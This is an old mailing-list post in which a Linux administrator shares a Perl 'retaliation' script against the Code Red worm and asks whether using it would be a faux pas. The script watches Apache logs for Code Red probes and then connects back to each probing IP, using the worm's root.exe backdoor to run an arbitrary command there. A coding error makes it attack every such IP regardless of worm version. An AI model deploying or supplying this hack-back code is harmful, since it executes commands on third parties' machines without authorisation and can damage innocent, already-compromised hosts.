So creating a fifo for apache to write its access log to and a script
like this would be a faux pas then?...
-Max
#!/usr/bin/perl
#
# Script to retaliate against Code Red Attacks.
# the author is not responsible for how you use this educational script.
use Socket;
$fifo = "/var/log/apache/apache.fifo";
$httplogfile = "/var/log/apache/access.log";
$wormlogfile = "/var/log/apache/codered.log";
# The command you want to run on the compromised machine.
$win_command = "";
#
# Shouldn't need to do anything below here
#
open (FILE, "<".$fifo) or die "cant open fifo";
while (1){
while (<FILE>){
&httplog;
if ($_ =~ m/default.ida/){
$ip = ((split " ", $_)[0]);
&logit;
if ($version = "2/3"){ &attack };
}
}
}
# Will never get here
close FILE;
exit 0;
sub httplog {
# create normal http log
open (HTTPLOG, ">>".$httplogfile) or die "cant open http logfile";
print HTTPLOG $_;
close HTTPLOG;
}
sub logit {
# Log compromised machine
open (LOGFILE, ">>".$wormlogfile) or die "cant open logfile";
$date = ((split " ", $_)[3]);
print LOGFILE $date," - ",$ip;
if ($_ =~ m/XXXXXX/){ $version = "2/3" }
if ($_ =~ m/NNNNNN/){ $version = "1" }
else { $version = "?" };
print LOGFILE " v",$version,"]\n";
close LOGFILE;
}
sub attack {
# Attack compromised machine
local $proto = getprotobyname('tcp');
socket(osock, PF_INET, SOCK_STREAM, $proto);
local $sin = sockaddr_in(80, inet_aton($ip));
connect(osock,$sin) or &attack_failed;
print osock "GET /scripts/root.exe HTTP/1.0 \n";
print osock $win_command,"\n";
close (osock);
}
sub attack_failed {
# If Attack Fails
open (LOGFILE, ">>".$wormlogfile) or die "cant open logfile";
print LOGFILE $ip," - ATTACK FAILED\n";
close LOGFILE;
}
--
Max Lock, Senior Linux Systems Administrator, TELE2 Mission Control UK.
Linux like wigwam. No windows, no gates, Apache inside.
